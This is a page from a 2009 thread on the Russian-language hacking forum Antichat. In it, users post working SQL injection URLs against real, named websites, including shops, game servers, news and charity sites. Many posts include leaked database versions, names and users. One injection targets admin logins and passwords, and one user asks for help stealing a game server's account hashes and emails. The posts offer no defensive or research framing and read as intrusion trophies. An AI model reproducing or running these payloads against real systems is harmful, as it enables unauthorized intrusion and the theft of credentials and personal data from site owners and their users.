ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #10781  
Старый 24.09.2009, 20:24
Shr3k
Новичок
Регистрация: 16.12.2008
Сообщений: 7
Провел на форуме:
211757

Репутация: 20
По умолчанию

Код:
http://www.marketcatalog.info/news.php?newsId=-78+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

http://www.torgovec.com/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--

http://www.alloffshore.net/news.php?newsId=-967+union+select+1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7--
на 1 хосте)
5.0.37-standard:admin_ecommerce:admin_ulisss@localhost
Код:
http://my-sky.org/news.php?form_id=-47+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6--&form_current_page=0
5.0.45-Debian_1-log:myskyorg:myskyorg@localhost
Код:
http://ukrsvit.net/news.php?id=-354+UNION+SELECT+1,2,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64)
см подробнее к 1 картинке =)
5.0.70-log/**/ukrsvit/**/ukrsvit@localhost
Код:
http://seowars.ru/seo-news/news.php?id_news=-585+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14
тайтл
5.0.81-community:seowars_base:seowars_user@localhost
Код:
http://playgame.org.ua/news.php?id=-673+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15
4.1.22-log:freemp3_slovo:freemp3_slovo@192.168.1.7
 
Ответить с цитированием

  #10782  
Старый 24.09.2009, 20:25
Dyxxx
Участник форума
Регистрация: 16.02.2009
Сообщений: 191
Провел на форуме:
879928

Репутация: 438
По умолчанию

celticarts.org pr5
The Celtic Arts Foundation
Код:
http://www.celticarts.org/index.php?page_id=4+and+substring(version(),1,1)=4+--+
4.1.22-standard | celticar_user@localhost
 
Ответить с цитированием

  #10783  
Старый 24.09.2009, 21:22
E-AL
Познающий
Регистрация: 03.10.2007
Сообщений: 37
Провел на форуме:
259133

Репутация: 68
По умолчанию

Код:
http://www.lagam.net/?page=7&itemId=-600+union+select+concat_ws(0x3a,concat_ws(0x3a,user(),version()),database())/*
ТИЦ: 10
PR: 2

User: status@localhost
Version: 4.1.22-community-nt
Name: l2jdb


Игровой сервер lineage2 =)

PS по серверам ла2 был опыт, все данные интересные лежат в таблице accounts (обычно логин, hash sha-1(base64) и мыло), но тут почему то доступа нет, если кто найдет способ - отпишите пожалуйста в пм.
 
Ответить с цитированием

  #10784  
Старый 24.09.2009, 23:19
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

Код:
http://www.halal-world.com/category.php?IndustryID=14+union+select+1,2,concat_ws(0x3a,loginid,password)+from+admin--
--------

Последний раз редактировалось jokester; 24.09.2009 в 23:28.. Причина: пароли запрещены
 
Ответить с цитированием

  #10785  
Старый 25.09.2009, 13:47
hackmon
Познающий
Регистрация: 16.09.2009
Сообщений: 86
Провел на форуме:
362547

Репутация: 93
По умолчанию

http://www.lapythie.free.fr/news/news.php?id=9999999999999999+union+select+1,2,conc at_ws%280x3a,version%28%29,database%28%29,user%28% 29%29,4,5,6,7,8--
 
Ответить с цитированием

  #10786  
Старый 25.09.2009, 15:18
HAXTA4OK
Reservists Of Antichat - Level 6
Регистрация: 15.03.2009
Сообщений: 560
Провел на форуме:
4358210

Репутация: 2017


По умолчанию

http://www.izbushka.ru/page.php?page=13)+and+substring(version(),1,1)=4%2 3&path=2
 
Ответить с цитированием

  #10787  
Старый 25.09.2009, 16:45
InDuStRieS
Постоянный
Регистрация: 15.03.2009
Сообщений: 435
Провел на форуме:
4061203

Репутация: 704
Отправить сообщение для InDuStRieS с помощью ICQ
По умолчанию

http://www.erasmus-entrepreneurs.eu/page.php?pid=777777771'+union+select+1,2,3,version (),5,6/*
 
Ответить с цитированием

  #10788  
Старый 25.09.2009, 21:49
Rubaka
Участник форума
Регистрация: 02.09.2007
Сообщений: 292
Провел на форуме:
3659973

Репутация: 466
Отправить сообщение для Rubaka с помощью ICQ
По умолчанию

http://bender.samaratoday.ru/webpage.php?id=19+version()+LIMIT+1,1

Database Version: 5.1.38
Database name: samaratoda_ben
User name: samaratoda_ben@localhost

есть таблица users:username,passwrd
 
Ответить с цитированием

  #10789  
Старый 25.09.2009, 21:50
SanHuan
Новичок
Регистрация: 19.08.2008
Сообщений: 29
Провел на форуме:
297836

Репутация: 18
По умолчанию

Код:
http://www.artgamma.ru/news.php?id=-191+union+select+1,version%28%29,@@version_compile_os,4,database%28%29,6,7,8,9,10,11,12,13,14,15
 
Ответить с цитированием

  #10790  
Старый 26.09.2009, 00:14
Swift
Banned
Регистрация: 27.10.2008
Сообщений: 78
Провел на форуме:
174909

Репутация: 454
По умолчанию

http://www.bridesathotbobbins.co.uk/?pageid=1+union+select+table_name,2,3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from+ information_schema.tables

http://www.casauna.se/showimages.php?mode=left&propertyID=1+union+select +concat(0x3a,version(),user(),database())/*

5.0.32-Debian_7etch11casauna@localhostCasauna
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ